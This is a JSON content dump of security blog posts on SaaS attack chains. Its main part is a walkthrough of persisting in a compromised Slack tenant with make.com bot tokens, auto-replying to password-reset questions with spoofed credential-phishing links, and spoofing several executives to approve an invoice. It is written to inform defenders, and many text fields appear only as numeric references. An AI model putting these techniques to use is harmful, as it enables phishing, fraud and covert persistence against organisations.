persistence",{"data":61619,"content":61620,"nodeType":945},{},[61621],{"data":61622,"content":61623,"nodeType":860},{},[61624],{"data":61625,"marks":61626,"value":61627,"nodeType":864},{},[],"This access will continue even if the user changes their password or resets MFA",{"data":61629,"content":61630,"nodeType":945},{},[61631],{"data":61632,"content":61633,"nodeType":860},{},[61634],{"data":61635,"marks":61636,"value":61637,"nodeType":864},{},[],"Not only do existing shadow workflows continue to work after password changes, an adversary can continue to create new ones and reuse the existing integrations.",{"data":61639,"content":61640,"nodeType":945},{},[61641],{"data":61642,"content":61643,"nodeType":860},{},[61644],{"data":61645,"marks":61646,"value":61647,"nodeType":864},{},[],"Any relevant logs will show access via legitimate IP addresses and OAuth integrations for SaaS automation apps ",{"data":61649,"content":61650,"nodeType":945},{},[61651,61658],{"data":61652,"content":61653,"nodeType":860},{},[61654],{"data":61655,"marks":61656,"value":61657,"nodeType":864},{},[],"Automation apps are so flexible that an adversary can do pretty much anything - it’s basically the offensive PowerShell of the SaaS world. Just some examples:",{"data":61659,"content":61660,"nodeType":941},{},[61661,61671,61681,61691],{"data":61662,"content":61663,"nodeType":945},{},[61664],{"data":61665,"content":61666,"nodeType":860},{},[61667],{"data":61668,"marks":61669,"value":61670,"nodeType":864},{},[],"Monitor all emails and files the user creates",{"data":61672,"content":61673,"nodeType":945},{},[61674],{"data":61675,"content":61676,"nodeType":860},{},[61677],{"data":61678,"marks":61679,"value":61680,"nodeType":864},{},[],"Delete email security alerts before the user sees them",{"data":61682,"content":61683,"nodeType":945},{},[61684],{"data":61685,"content":61686,"nodeType":860},{},[61687],{"data":61688,"marks":61689,"value":61690,"nodeType":864},{},[],"Intercept password reset and passwordless login emails to access other apps",{"data":61692,"content":61693,"nodeType":945},{},[61694],{"data":61695,"content":61696,"nodeType":860},{},[61697],{"data":61698,"marks":61699,"value":61700,"nodeType":864},{},[],"Monitor instant messaging apps and use it to send targeted internal social engineering emails",{"data":61702,"content":61703,"nodeType":945},{},[61704],{"data":61705,"content":61706,"nodeType":860},{},[61707],{"data":61708,"marks":61709,"value":61710,"nodeType":864},{},[],"If targeted users are already using automation apps legitimately, it’s even more stealthy - you won’t even see any new integrations or permission grants appear as the user will have already granted these legitimately.",{"data":61712,"content":61713,"nodeType":945},{},[61714],{"data":61715,"content":61716,"nodeType":860},{},[61717],{"data":61718,"marks":61719,"value":61720,"nodeType":864},{},[],"If admin consent has been granted to the automation app, any user can be targeted without generating new permission grant logs even if they have never used the app.",{"data":61722,"content":61723,"nodeType":1009},{},[61724],{"data":61725,"marks":61726,"value":24968,"nodeType":864},{},[],{"data":61728,"content":61729,"nodeType":860},{},[61730],{"data":61731,"marks":61732,"value":61733,"nodeType":864},{},[],"We have seen how two new SaaS-focused attack techniques can be combined into one more effective attack chain - in this case, a particularly nasty and stealthy persistence technique. This shows how even if a user compromise is detected very early, with password and MFA resets immediately issued, adversaries can maintain control over the account regardless.",{"data":61735,"content":61736,"nodeType":860},{},[61737],{"data":61738,"marks":61739,"value":61740,"nodeType":864},{},[],"This shows how even legitimate SaaS applications have incredibly powerful offensive use cases and very careful attention needs to be paid to integrations with highly sensitive permissions, even when they are approved and vetted applications. Incident response teams especially need to be well aware of these techniques when investigating potential user account compromises as persistence approaches can extend much further than endpoint implants and stolen passwords.","The shadow workflow’s evil twin: A nearly invisible attack chain","2023-09-11T00:00:00.000Z","nearly-invisible-attack-chain",{"items":61745},[61746,61748],{"sys":61747,"name":6593},{"id":6592},{"sys":61749,"name":342},{"id":6596},{"items":61751},[61752],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":61753},{"url":4955},"oktajacking","blog/oktajacking",{"json":61757},{"data":61758,"content":61759,"nodeType":856},{},[61760],{"data":61761,"content":61762,"nodeType":860},{},[61763],{"data":61764,"marks":61765,"value":61766,"nodeType":864},{},[],"We’ll explore how Okta’s AD synchronization allows you to force Okta to capture credentials and keylog for you so you can launch convincing phishing attacks. Then we'll demonstrate how it can be used as a stealthy watering-hole style lateral movement attack.","In this article, we'll show you how to use Okta to do keylogging for you, without needing to have your own malicious domain hosting your malicious SAML server. ",{"id":61769,"publishedAt":61770},"6ckZjBZzRgvEVpSScGWeZQ","2026-08-12T11:55:44.040Z",{"items":61772},[61773,61775],{"sys":61774,"name":6593},{"id":6592},{"sys":61776,"name":297},{"id":2732},{"items":61778},[61779,61781,61783,61785,61787,61789,61791,61793,61795,61797],{"sys":61780,"name":279,"slug":280,"tier":31},{"id":276},{"sys":61782,"name":413,"slug":414,"tier":31},{"id":410},{"sys":61784,"name":545,"slug":546,"tier":31},{"id":542},{"sys":61786,"name":519,"slug":520,"tier":31},{"id":516},{"sys":61788,"name":342,"slug":343,"tier":31},{"id":339},{"sys":61790,"name":324,"slug":325,"tier":45},{"id":321},{"sys":61792,"name":404,"slug":405,"tier":45},{"id":401},{"sys":61794,"name":607,"slug":608,"tier":45},{"id":604},{"sys":61796,"name":431,"slug":432,"tier":45},{"id":428},{"sys":61798,"name":466,"slug":467,"tier":45},{"id":463},"MUmJg91y9m-huImAsj_zXGOKiU5yELiA7jWmzrfiDPA",{"id":61801,"title":58388,"authorsCollection":61802,"content":61807,"extension":228,"faqItemsCollection":62732,"faqTitle":59,"featured":6,"hashTags":59,"meta":62734,"metaTitle":62735,"ogImage":59,"postType":5740,"publishedDate":62736,"relatedBlogPostsCollection":62737,"slug":58389,"stem":64649,"subtitle":59,"summary":64650,"synopsis":64667,"sys":64668,"tagsCollection":64670,"topicsCollection":64676,"__hash__":64698},"blog/blog/phishing-slack-persistence.json",{"items":61803},[61804],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":61805,"profilePicture":61806},[4953],{"url":4955},{"json":61808,"links":62621},{"data":61809,"content":61810,"nodeType":856},{},[61811,61829,61849,61856,61937,61943,61965,61971,61977,61983,61989,62019,62025,62061,62068,62073,62080,62100,62107,62114,62134,62156,62177,62184,62191,62198,62204,62211,62218,62225,62231,62237,62257,62264,62270,62276,62282,62289,62304,62310,62316,62323,62330,62337,62344,62351,62357,62364,62383,62389,62396,62402,62409,62415,62422,62429,62436,62443,62449,62456,62461,62467,62474,62481,62588,62594,62600,62607,62614],{"data":61812,"content":61813,"nodeType":860},{},[61814,61818,61825],{"data":61815,"marks":61816,"value":61817,"nodeType":864},{},[],"This is the fourth post in a series on attack chains formed by combining techniques in the ",{"data":61819,"content":61820,"nodeType":883},{"uri":6418},[61821],{"data":61822,"marks":61823,"value":5765,"nodeType":864},{},[61824],{"type":1455},{"data":61826,"marks":61827,"value":61828,"nodeType":864},{},[]," and the second post of two focused on attacking instant messaging applications with Slack as the primary example. ",{"data":61830,"content":61831,"nodeType":860},{},[61832,61835,61845],{"data":61833,"marks":61834,"value":2761,"nodeType":864},{},[],{"data":61836,"content":61839,"nodeType":57700},{"target":61837},{"sys":61838},{"id":57693,"type":1001,"linkType":1002},[61840],{"data":61841,"marks":61842,"value":61844,"nodeType":864},{},[61843],{"type":1455},"previous post",{"data":61846,"marks":61847,"value":61848,"nodeType":864},{},[]," focused on external attackers gaining an initial foothold during the initial access phase of the kill chain. In this post we’ll be focusing on persistence and lateral movement for an attacker that has already gained a foothold on a Slack tenant by compromising an internal account. ",{"data":61850,"content":61851,"nodeType":860},{},[61852],{"data":61853,"marks":61854,"value":61855,"nodeType":864},{},[],"We’ll build on the techniques in the previous post as well as introducing more and so will cover the following SaaS attack techniques, including chaining them together:",{"data":61857,"content":61858,"nodeType":941},{},[61859,61878,61897,61918],{"data":61860,"content":61861,"nodeType":945},{},[61862],{"data":61863,"content":61864,"nodeType":860},{},[61865,61868,61875],{"data":61866,"marks":61867,"value":21,"nodeType":864},{},[],{"data":61869,"content":61870,"nodeType":883},{"uri":57755},[61871],{"data":61872,"marks":61873,"value":57760,"nodeType":864},{},[61874],{"type":1455},{"data":61876,"marks":61877,"value":21,"nodeType":864},{},[],{"data":61879,"content":61880,"nodeType":945},{},[61881],{"data":61882,"content":61883,"nodeType":860},{},[61884,61887,61894],{"data":61885,"marks":61886,"value":21,"nodeType":864},{},[],{"data":61888,"content":61889,"nodeType":883},{"uri":57775},[61890],{"data":61891,"marks":61892,"value":57780,"nodeType":864},{},[61893],{"type":1455},{"data":61895,"marks":61896,"value":21,"nodeType":864},{},[],{"data":61898,"content":61899,"nodeType":945},{},[61900],{"data":61901,"content":61902,"nodeType":860},{},[61903,61906,61915],{"data":61904,"marks":61905,"value":21,"nodeType":864},{},[],{"data":61907,"content":61909,"nodeType":883},{"uri":61908},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/system_integrations/description.md",[61910],{"data":61911,"marks":61912,"value":61914,"nodeType":864},{},[61913],{"type":1455},"SAT1036 - OAuth system integrations ",{"data":61916,"marks":61917,"value":21,"nodeType":864},{},[],{"data":61919,"content":61920,"nodeType":945},{},[61921],{"data":61922,"content":61923,"nodeType":860},{},[61924,61927,61934],{"data":61925,"marks":61926,"value":21,"nodeType":864},{},[],{"data":61928,"content":61929,"nodeType":883},{"uri":59957},[61930],{"data":61931,"marks":61932,"value":59963,"nodeType":864},{},[61933],{"type":1455},{"data":61935,"marks":61936,"value":21,"nodeType":864},{},[],{"data":61938,"content":61939,"nodeType":1009},{},[61940],{"data":61941,"marks":61942,"value":57790,"nodeType":864},{},[],{"data":61944,"content":61945,"nodeType":860},{},[61946,61951,61960],{"data":61947,"marks":61948,"value":61950,"nodeType":864},{},[61949],{"type":2246},"If you’ve just read the ",{"data":61952,"content":61955,"nodeType":57700},{"target":61953},{"sys":61954},{"id":57693,"type":1001,"linkType":1002},[61956],{"data":61957,"marks":61958,"value":61844,"nodeType":864},{},[61959],{"type":2246},{"data":61961,"marks":61962,"value":61964,"nodeType":864},{},[61963],{"type":2246},", you can skip this introductory piece and jump straight to the next section.",{"data":61966,"content":61967,"nodeType":860},{},[61968],{"data":61969,"marks":61970,"value":57805,"nodeType":864},{},[],{"data":61972,"content":61973,"nodeType":860},{},[61974],{"data":61975,"marks":61976,"value":57812,"nodeType":864},{},[],{"data":61978,"content":61979,"nodeType":860},{},[61980],{"data":61981,"marks":61982,"value":57819,"nodeType":864},{},[],{"data":61984,"content":61985,"nodeType":860},{},[61986],{"data":61987,"marks":61988,"value":57826,"nodeType":864},{},[],{"data":61990,"content":61991,"nodeType":941},{},[61992,62001,62010],{"data":61993,"content":61994,"nodeType":945},{},[61995],{"data":61996,"content":61997,"nodeType":860},{},[61998],{"data":61999,"marks":62000,"value":57839,"nodeType":864},{},[],{"data":62002,"content":62003,"nodeType":945},{},[62004],{"data":62005,"content":62006,"nodeType":860},{},[62007],{"data":62008,"marks":62009,"value":57849,"nodeType":864},{},[],{"data":62011,"content":62012,"nodeType":945},{},[62013],{"data":62014,"content":62015,"nodeType":860},{},[62016],{"data":62017,"marks":62018,"value":57859,"nodeType":864},{},[],{"data":62020,"content":62021,"nodeType":860},{},[62022],{"data":62023,"marks":62024,"value":57866,"nodeType":864},{},[],{"data":62026,"content":62027,"nodeType":860},{},[62028,62031,62038,62041,62048,62051,62058],{"data":62029,"marks":62030,"value":57873,"nodeType":864},{},[],{"data":62032,"content":62033,"nodeType":883},{"uri":57876},[62034],{"data":62035,"marks":62036,"value":57882,"nodeType":864},{},[62037],{"type":1455},{"data":62039,"marks":62040,"value":57886,"nodeType":864},{},[],{"data":62042,"content":62043,"nodeType":883},{"uri":57889},[62044],{"data":62045,"marks":62046,"value":57895,"nodeType":864},{},[62047],{"type":1455},{"data":62049,"marks":62050,"value":57899,"nodeType":864},{},[],{"data":62052,"content":62053,"nodeType":883},{"uri":57902},[62054],{"data":62055,"marks":62056,"value":57908,"nodeType":864},{},[62057],{"type":1455},{"data":62059,"marks":62060,"value":2924,"nodeType":864},{},[],{"data":62062,"content":62063,"nodeType":860},{},[62064],{"data":62065,"marks":62066,"value":62067,"nodeType":864},{},[],"However, in this article we’ll focus on a few techniques specific to Slack.",{"data":62069,"content":62072,"nodeType":996},{"target":62070},{"sys":62071},{"id":57916,"type":1001,"linkType":1002},[],{"data":62074,"content":62075,"nodeType":1009},{},[62076],{"data":62077,"marks":62078,"value":62079,"nodeType":864},{},[],"Slack apps - spoofing and persistence",{"data":62081,"content":62082,"nodeType":860},{},[62083,62087,62096],{"data":62084,"marks":62085,"value":62086,"nodeType":864},{},[],"In the ",{"data":62088,"content":62091,"nodeType":57700},{"target":62089},{"sys":62090},{"id":57693,"type":1001,"linkType":1002},[62092],{"data":62093,"marks":62094,"value":61844,"nodeType":864},{},[62095],{"type":1455},{"data":62097,"marks":62098,"value":62099,"nodeType":864},{},[],", we covered user spoofing and link preview spoofing attacks that can be conducted externally. But do we have any other options available once on the inside that wouldn’t be available to us externally? ",{"data":62101,"content":62102,"nodeType":860},{},[62103],{"data":62104,"marks":62105,"value":62106,"nodeType":864},{},[],"What happens if you compromise a Slack account and then want to persist and/or move laterally? Ordinarily, you can maintain access until session expiry or a password change is forced or the account is deactivated/deleted. For further actual impact, you could silently read messages as the user continues to operate their account but if you start sending out malicious links to other targets, in an attempt to move laterally, then the real user is probably going to become aware of the compromise very quickly from seeing the malicious messages in their own chat client.",{"data":62108,"content":62109,"nodeType":860},{},[62110],{"data":62111,"marks":62112,"value":62113,"nodeType":864},{},[],"Alternatively, what happens in a situation where a disgruntled employee is let go and their account is terminated? Could they maintain some level of access and use it maliciously?",{"data":62115,"content":62116,"nodeType":860},{},[62117,62121,62130],{"data":62118,"marks":62119,"value":62120,"nodeType":864},{},[],"One key feature that some IM apps like Slack have is app integrations to allow bots and other functionality, usually using OAuth under the hood. This allows very useful functionality for users, but also opens up a whole new angle for persistence and spoofing. In Slack’s case, its separation of ",{"data":62122,"content":62124,"nodeType":883},{"uri":62123},"https://api.slack.com/authentication/token-types",[62125],{"data":62126,"marks":62127,"value":62129,"nodeType":864},{},[62128],{"type":1455},"user tokens and bot tokens",{"data":62131,"marks":62132,"value":62133,"nodeType":864},{},[]," allows for particularly interesting spoofing and persistence capabilities, which we’ll come to later.",{"data":62135,"content":62136,"nodeType":860},{},[62137,62141,62152],{"data":62138,"marks":62139,"value":62140,"nodeType":864},{},[],"We could probably write several posts on OAuth apps alone. In fact, we’ve written about ",{"data":62142,"content":62146,"nodeType":57700},{"target":62143},{"sys":62144},{"id":62145,"type":1001,"linkType":1002},"3QpljiYU9YHEUhd5gsvypj",[62147],{"data":62148,"marks":62149,"value":62151,"nodeType":864},{},[62150],{"type":1455},"using OAuth for persistence",{"data":62153,"marks":62154,"value":62155,"nodeType":864},{},[]," more generally before. However, in this case we are going to focus on a couple examples of using a legitimate Slack app maliciously. ",{"data":62157,"content":62158,"nodeType":860},{},[62159,62163,62173],{"data":62160,"marks":62161,"value":62162,"nodeType":864},{},[],"In a previous blog post in this series, we spoke about ",{"data":62164,"content":62167,"nodeType":57700},{"target":62165},{"sys":62166},{"id":60862,"type":1001,"linkType":1002},[62168],{"data":62169,"marks":62170,"value":62172,"nodeType":864},{},[62171],{"type":1455},"shadow workflows",{"data":62174,"marks":62175,"value":62176,"nodeType":864},{},[]," using SaaS automation apps. We’re going to follow this theme again here and show how they can also be used with Slack. Previously, we used Zapier as our automation app example, but this time we are going to use make.com. ",{"data":62178,"content":62179,"nodeType":1312},{},[62180],{"data":62181,"marks":62182,"value":62183,"nodeType":864},{},[],"Persistent spoofing",{"data":62185,"content":62186,"nodeType":860},{},[62187],{"data":62188,"marks":62189,"value":62190,"nodeType":864},{},[],"We’ll show here how you can connect make.com to a Slack account you control and then maintain persistence, both as that user and partial access even if the account is deactivated or deleted, by using bot tokens. This is especially important in a disgruntled employee scenario as they could use this to maintain some level of access to Slack even if they were fired and had their account deleted. ",{"data":62192,"content":62193,"nodeType":860},{},[62194],{"data":62195,"marks":62196,"value":62197,"nodeType":864},{},[],"If we create a make.com account and click to create a new scenario, we can select Slack from the long list of integration possibilities. We’ll then be prompted to pick a specific Slack module. In more complicated scenarios, these can be chained together to take actions on events, but in this case we are going to create a simple scenario with just one module used to send a custom Slack message.",{"data":62199,"content":62203,"nodeType":996},{"target":62200},{"sys":62201},{"id":62202,"type":1001,"linkType":1002},"2k6NeCNERIL4zx3FtTD97p",[],{"data":62205,"content":62206,"nodeType":860},{},[62207],{"data":62208,"marks":62209,"value":62210,"nodeType":864},{},[],"If we select the module “Create a Message” we’ll be prompted to select a Slack connection to use and then fill out the other details for the module. Since we haven’t already created a Slack connection, we’ll be prompted to create a new one. For this module, we have the option of creating either a user token or a bot token. ",{"data":62212,"content":62213,"nodeType":860},{},[62214],{"data":62215,"marks":62216,"value":62217,"nodeType":864},{},[],"A user token has full capabilities and will continue to operate in the event of a password change. However, if the user account is deactivated or deleted then it will cease to work. In contrast, the bot connection is limited in capabilities compared to a full user token, but the advantage is that it will continue to operate even if the user account is deactivated or deleted.",{"data":62219,"content":62220,"nodeType":860},{},[62221],{"data":62222,"marks":62223,"value":62224,"nodeType":864},{},[],"This means gaining even temporary control of a Slack account, either through a user compromise or by being a disgruntled employee (or fired employee), could enable the permanent ability to spoof messages unless the entire app is revoked from Slack. Even with the high bar set by shadow workflows, that’s a pretty epic level of persistence!\n\nSo, we’re going to select the bot token for this example:",{"data":62226,"content":62230,"nodeType":996},{"target":62227},{"sys":62228},{"id":62229,"type":1001,"linkType":1002},"2Hx4QLlhLoXxoAVN7R72Tm",[],{"data":62232,"content":62236,"nodeType":996},{"target":62233},{"sys":62234},{"id":62235,"type":1001,"linkType":1002},"6oSc2GzeZh5vUhyKC8viMn",[],{"data":62238,"content":62239,"nodeType":860},{},[62240,62244,62253],{"data":62241,"marks":62242,"value":62243,"nodeType":864},{},[],"Now that we’ve finished setting up the bot connection, we can configure the specifics for the module itself. In this case, we’ll demonstrate using it to send the same type of spoofed message we covered in the ",{"data":62245,"content":62248,"nodeType":57700},{"target":62246},{"sys":62247},{"id":57693,"type":1001,"linkType":1002},[62249],{"data":62250,"marks":62251,"value":61844,"nodeType":864},{},[62252],{"type":1455},{"data":62254,"marks":62255,"value":62256,"nodeType":864},{},[],", only it’ll be from a bot account. ",{"data":62258,"content":62259,"nodeType":860},{},[62260],{"data":62261,"marks":62262,"value":62263,"nodeType":864},{},[],"By default, it’ll use the name and icon of the Slack app, in this case Integromat (Make.com’s former name). Alternatively, we can choose to override this, which we will do in this case to mirror the user spoofing attacks we covered earlier. The only difference to a normal user message is there will be a small “APP” icon after the user. ",{"data":62265,"content":62269,"nodeType":996},{"target":62266},{"sys":62267},{"id":62268,"type":1001,"linkType":1002},"44kvbP0IYSIrp5anRtuVhN",[],{"data":62271,"content":62275,"nodeType":996},{"target":62272},{"sys":62273},{"id":62274,"type":1001,"linkType":1002},"225FeHRut5kzTuX1n0NDLt",[],{"data":62277,"content":62281,"nodeType":996},{"target":62278},{"sys":62279},{"id":62280,"type":1001,"linkType":1002},"1c5AcrsoegPrNwrXtdCCaJ",[],{"data":62283,"content":62284,"nodeType":860},{},[62285],{"data":62286,"marks":62287,"value":62288,"nodeType":864},{},[],"The other great advantage with this is that it’s difficult to see which user is actually responsible for the spoofing. If a compromised user account is used to send spoofed messages, not only may the real employee see the messages and alert security, but if the messages are investigated by a target or the security team, it’s quick to click on the user and see the real email address associated with the account. ",{"data":62290,"content":62291,"nodeType":860},{},[62292,62296,62301],{"data":62293,"marks":62294,"value":62295,"nodeType":864},{},[],"However, when it’s done with a bot token for an app, ",{"data":62297,"marks":62298,"value":62300,"nodeType":864},{},[62299],{"type":2246},"you can only see the Slack app that was responsible, not the actual user account it originated from",{"data":62302,"marks":62303,"value":26971,"nodeType":864},{},[],{"data":62305,"content":62309,"nodeType":996},{"target":62306},{"sys":62307},{"id":62308,"type":1001,"linkType":1002},"62F3HPZdrQqBrUDV47pjjL",[],{"data":62311,"content":62315,"nodeType":996},{"target":62312},{"sys":62313},{"id":62314,"type":1001,"linkType":1002},"7A8Run1271YslWTHNBqhc",[],{"data":62317,"content":62318,"nodeType":1312},{},[62319],{"data":62320,"marks":62321,"value":62322,"nodeType":864},{},[],"Automated phishing replies",{"data":62324,"content":62325,"nodeType":860},{},[62326],{"data":62327,"marks":62328,"value":62329,"nodeType":864},{},[],"Ok, so we’ve just seen how you can internally spoof a message via a Slack app in a way that’s harder to track back to the original compromised user account and also achieve persistence at the same time. Pretty neat! But can we do more?",{"data":62331,"content":62332,"nodeType":860},{},[62333],{"data":62334,"marks":62335,"value":62336,"nodeType":864},{},[],"One of the great features of IM apps is the fact they are…well…instant! By making a slightly more sophisticated scenario with make.com, we can monitor public channels for messages that meet certain criteria and then immediately spoof a target phishing link as a reply. Phishing where the target is the one to reach out originally is much more likely to be successful as it’s more like a watering hole attack - the phishing message itself won’t be seen as unsolicited.",{"data":62338,"content":62339,"nodeType":860},{},[62340],{"data":62341,"marks":62342,"value":62343,"nodeType":864},{},[],"For example, let’s consider a scenario where someone has forgotten their password, or some other common IT support request, and they raise a question on a Slack channel about it. We could monitor for that and automatically respond. ",{"data":62345,"content":62346,"nodeType":860},{},[62347],{"data":62348,"marks":62349,"value":62350,"nodeType":864},{},[],"One caveat here is make.com requires we use a user token for the message monitoring part and therefore this attack couldn’t survive a deactivated/deleted Slack user account. However, it will still survive password changes and so is still a useful persistence option too. Additionally, the bot token can still be used for the message sending component in order to mask the source of the attack as above. ",{"data":62352,"content":62356,"nodeType":996},{"target":62353},{"sys":62354},{"id":62355,"type":1001,"linkType":1002},"4AdugwjwhzK5gdxojpqDwn",[],{"data":62358,"content":62359,"nodeType":860},{},[62360],{"data":62361,"marks":62362,"value":62363,"nodeType":864},{},[],"In this case, we have configured a Slack module to watch public channel messages using a user token and apply a filter on those containing the words “password” and “reset”. If that is the case, we then trigger a spoofed threaded reply using the bot token and impersonating an “IT bot” and giving a link to documentation for how to perform a self-service password request. ",{"data":62365,"content":62366,"nodeType":860},{},[62367,62371,62379],{"data":62368,"marks":62369,"value":62370,"nodeType":864},{},[],"This makes use of the same link preview spoofing techniques we covered in the ",{"data":62372,"content":62375,"nodeType":57700},{"target":62373},{"sys":62374},{"id":57693,"type":1001,"linkType":1002},[62376],{"data":62377,"marks":62378,"value":61844,"nodeType":864},{},[],{"data":62380,"marks":62381,"value":62382,"nodeType":864},{},[]," and the actual link will present a fake Google login page to harvest credentials.  ",{"data":62384,"content":62388,"nodeType":996},{"target":62385},{"sys":62386},{"id":62387,"type":1001,"linkType":1002},"6BuFqoDtaUGpz48ANXRDJu",[],{"data":62390,"content":62391,"nodeType":860},{},[62392],{"data":62393,"marks":62394,"value":62395,"nodeType":864},{},[],"Here’s a quick video demonstrating this combination of user spoofing, link preview spoofing and a shadow workflow in action:",{"data":62397,"content":62401,"nodeType":996},{"target":62398},{"sys":62399},{"id":62400,"type":1001,"linkType":1002},"2PYOjiz7DIRKqdYuushsqB",[],{"data":62403,"content":62404,"nodeType":860},{},[62405],{"data":62406,"marks":62407,"value":62408,"nodeType":864},{},[],"To summarize, heres a diagram to show how this all fits together:",{"data":62410,"content":62414,"nodeType":996},{"target":62411},{"sys":62412},{"id":62413,"type":1001,"linkType":1002},"6BsctEd635MRwcuzpOhx1V",[],{"data":62416,"content":62417,"nodeType":1312},{},[62418],{"data":62419,"marks":62420,"value":62421,"nodeType":864},{},[],"Multi-party spoofing",{"data":62423,"content":62424,"nodeType":860},{},[62425],{"data":62426,"marks":62427,"value":62428,"nodeType":864},{},[],"Another great possibility provided from using Slack apps and bot tokens for spoofing is the ability to spoof inline with existing communications as multiple parties. Ordinarily, if a Slack user kept changing their name, handle and photo for spoofing internally, Slack would change all existing messages to the latest profile data every time. That makes it hard to spoof multiple identities in short time windows and so an attacker could only really spoof one person at a time. However, with Slack apps you can inject messages as different people at different points of a conversation using bot tokens.",{"data":62430,"content":62431,"nodeType":860},{},[62432],{"data":62433,"marks":62434,"value":62435,"nodeType":864},{},[],"Consider the following example, where I’m using my own internal account to message the CFO about paying a malicious invoice that I have hypothetically raised. Perhaps they then indicate approval is needed from another party, in this case the CEO. Similarly, this might be a common process for access requests requiring manager approval and many other business processes. ",{"data":62437,"content":62438,"nodeType":860},{},[62439],{"data":62440,"marks":62441,"value":62442,"nodeType":864},{},[],"In this case, I’m able to quickly spoof a message as another user to act as the approval in a manner that is pretty sneaky. The only giveaway at first glance is the “APP” tag after the spoofed message.",{"data":62444,"content":62448,"nodeType":996},{"target":62445},{"sys":62446},{"id":62447,"type":1001,"linkType":1002},"0Qrre7ZeVsFu1usSSyNS8",[],{"data":62450,"content":62451,"nodeType":860},{},[62452],{"data":62453,"marks":62454,"value":62455,"nodeType":864},{},[],"This is just one example but the ability to spoof multiple identities simultaneously from just one compromised account on what is usually seen as a trusted internal communications system really opens up a ton of possibilities for social engineering attacks focused on lateral movement. ",{"data":62457,"content":62460,"nodeType":996},{"target":62458},{"sys":62459},{"id":58370,"type":1001,"linkType":1002},[],{"data":62462,"content":62463,"nodeType":1009},{},[62464],{"data":62465,"marks":62466,"value":58288,"nodeType":864},{},[],{"data":62468,"content":62469,"nodeType":860},{},[62470],{"data":62471,"marks":62472,"value":62473,"nodeType":864},{},[],"After two whole posts on attacking Slack, covering both external attacks during the initial access phase and internal attacks in the persistence and lateral movement phases, we’ve covered a serious amount of ground! ",{"data":62475,"content":62476,"nodeType":860},{},[62477],{"data":62478,"marks":62479,"value":62480,"nodeType":864},{},[],"It’s worth taking a step back and considering the key impact points:",{"data":62482,"content":62483,"nodeType":941},{},[62484,62494,62503,62512,62522,62555],{"data":62485,"content":62486,"nodeType":945},{},[62487],{"data":62488,"content":62489,"nodeType":860},{},[62490],{"data":62491,"marks":62492,"value":62493,"nodeType":864},{},[],"IM apps like Slack are now external phishing and social engineering vectors, not just internal ones",{"data":62495,"content":62496,"nodeType":945},{},[62497],{"data":62498,"content":62499,"nodeType":860},{},[62500],{"data":62501,"marks":62502,"value":58318,"nodeType":864},{},[],{"data":62504,"content":62505,"nodeType":945},{},[62506],{"data":62507,"content":62508,"nodeType":860},{},[62509],{"data":62510,"marks":62511,"value":58328,"nodeType":864},{},[],{"data":62513,"content":62514,"nodeType":945},{},[62515],{"data":62516,"content":62517,"nodeType":860},{},[62518],{"data":62519,"marks":62520,"value":62521,"nodeType":864},{},[],"Malicious Slack messages can be modified later to replace the phishing link to cover up the attack",{"data":62523,"content":62524,"nodeType":945},{},[62525,62532],{"data":62526,"content":62527,"nodeType":860},{},[62528],{"data":62529,"marks":62530,"value":62531,"nodeType":864},{},[],"Slack apps, and especially bot tokens, can be used for very effective persistence techniques. Some examples:",{"data":62533,"content":62534,"nodeType":941},{},[62535,62545],{"data":62536,"content":62537,"nodeType":945},{},[62538],{"data":62539,"content":62540,"nodeType":860},{},[62541],{"data":62542,"marks":62543,"value":62544,"nodeType":864},{},[],"It’s possible to read all messages even after a compromised user changes their password",{"data":62546,"content":62547,"nodeType":945},{},[62548],{"data":62549,"content":62550,"nodeType":860},{},[62551],{"data":62552,"marks":62553,"value":62554,"nodeType":864},{},[],"It’s possible to send (and spoof) messages even if the compromised user account is deleted (e.g. a disgruntled employee who is fired)",{"data":62556,"content":62557,"nodeType":945},{},[62558,62565],{"data":62559,"content":62560,"nodeType":860},{},[62561],{"data":62562,"marks":62563,"value":62564,"nodeType":864},{},[],"Slack apps and shadow workflows can be used to conduct some fairly advanced social engineering attacks once an attack has a foothold on a Slack tenant. Some examples:",{"data":62566,"content":62567,"nodeType":941},{},[62568,62578],{"data":62569,"content":62570,"nodeType":945},{},[62571],{"data":62572,"content":62573,"nodeType":860},{},[62574],{"data":62575,"marks":62576,"value":62577,"nodeType":864},{},[],"Automatically phishing employees in response to common IT support questions",{"data":62579,"content":62580,"nodeType":945},{},[62581],{"data":62582,"content":62583,"nodeType":860},{},[62584],{"data":62585,"marks":62586,"value":62587,"nodeType":864},{},[],"Multi-party spoofing for advanced social engineering",{"data":62589,"content":62590,"nodeType":1009},{},[62591],{"data":62592,"marks":62593,"value":24968,"nodeType":864},{},[],{"data":62595,"content":62596,"nodeType":860},{},[62597],{"data":62598,"marks":62599,"value":58351,"nodeType":864},{},[],{"data":62601,"content":62602,"nodeType":860},{},[62603],{"data":62604,"marks":62605,"value":62606,"nodeType":864},{},[],"This also means organizations reliant on traditional email security gateways and email-based phishing training are likely to see the effectiveness of these controls decrease if attacks shift to the IM apps. ",{"data":62608,"content":62609,"nodeType":860},{},[62610],{"data":62611,"marks":62612,"value":62613,"nodeType":864},{},[],"In this article, we highlighted a number of spoofing, phishing and persistence techniques that can be employed by an attacker with a foothold that has compromised an internal account on a Slack tenant in order to persist their access and perform lateral movement. In the previous article, we covered spoofing and phishing techniques that could be used by external attackers in the initial access phase to get that first foothold in the first place.",{"data":62615,"content":62616,"nodeType":860},{},[62617],{"data":62618,"marks":62619,"value":62620,"nodeType":864},{},[],"While this article focused on Slack specifically, similar attacks may be possible for other IM apps as well. Going forwards, it will be important for organizations to factor in these types of attacks into their security strategies.",{"entries":62622},{"inline":62623,"hyperlink":62624,"block":62633},[],[62625,62627,62631],{"sys":62626,"__typename":2059,"title":58384,"slug":58385},{"id":57693},{"sys":62628,"__typename":2059,"title":62629,"slug":62630},{"id":62145},"Maintaining persistent access in a SaaS-first world","maintaining-persistent-access-in-a-saas-first-world",{"sys":62632,"__typename":2059,"title":61741,"slug":61743},{"id":60862},[62634,62636,62644,62652,62659,62666,62673,62681,62689,62696,62704,62711,62716,62722,62730],{"sys":62635,"__typename":1717,"type":58393,"ctaText":58394,"buttonLabel":58395,"buttonColour":1721,"buttonUrl":59},{"id":57916},{"sys":62637,"__typename":1724,"title":62638,"caption":62639,"layoutMode":59,"file":62640},{"id":62202},"Slack phishing 2: new make.com scenario","Creating a new scenario in make.com and picking a Slack 